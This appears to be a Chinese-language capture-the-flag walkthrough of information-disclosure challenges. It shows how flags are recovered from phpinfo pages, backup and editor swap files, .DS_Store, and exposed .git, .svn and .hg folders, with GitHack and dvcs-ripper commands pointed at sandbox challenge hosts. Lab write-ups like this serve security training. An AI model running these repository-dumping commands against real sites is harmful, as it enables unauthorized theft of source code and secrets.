1. 信息泄露
1.1. 目录遍历
手动查找目录,找到 flag
1.2. PHPINFO
查看 phpinfo,搜索到 flag
1.3. 备份文件下载
1.3.1. 网站源码

bp 构造 payload,获取到 www.zip 文件,解压

文件中未找到,访问 flag_183531374.txt 获取到 flag
1.3.2. bak 文件

访问 index.php.bak 文件获取到 flag

1.3.3. vim 缓存
访问 .index.php.swp 文件,找到 flag

1.3.4. .DS_Store
访问 .DS_Store 文件,010editer 打开文件

发现 $10010cb6de4616ede8b328b9d2554a28.txt 尝试访问,10010cb6de4616ede8b328b9d2554a28.txt 成功获取 flag
1.4. git 泄露
1.4.1. Log
安装 python2、githack、git
1
C:\Python27\python.exe GitHack.py http://challenge-5cb803c5533f39b4.sandbox.ctfhub.com:10800/.git/
git log 查看 log

发现 add flag,回退上一版本
1
2
git reset --hard HEAD^
git reset --hard HEAD~1

查看 txt 文件

1.4.2. Stash
1
C:\Python27\python.exe GitHack.py http://challenge-ca3ba3c6234445cf.sandbox.ctfhub.com:10800/.git/
git stash show

git stash pop 查看文件

1.4.3. Index
1
python GitHack.py http://challenge-2a69d53086d643a3.sandbox.ctfhub.com:10800/.git/
查看 index 文件

查看 1588776130569.txt

1.5. SVN 泄露

linux 系统上安装 dvcs-ripper
1
2
3
4
5
6
7
./rip-svn.pl -u http://challenge-6063e4511270c110.sandbox.ctfhub.com:10800/.svn/
la
cd .svn
cat wc.db | grep -a ctfhub
cd pristine/
la
cat 75/7522b3c99b02d3df183cc256ce3629ab8c37f958.svn-base

1.6. HG 泄露

1
2
./rip-hg.pl -u http://challenge-f9d41b1415c932d8.sandbox.ctfhub.com:10800/.hg/
tree .hg


查找到 flag_2968918689.txt
访问 [http://challenge-f9d41b1415c932d8.sandbox.ctfhub.com:10800/flag_2968918689.txt](http://challenge-f9d41b1415c932d8.sandbox.ctfhub.com:10800/flag_2968918689.txt)
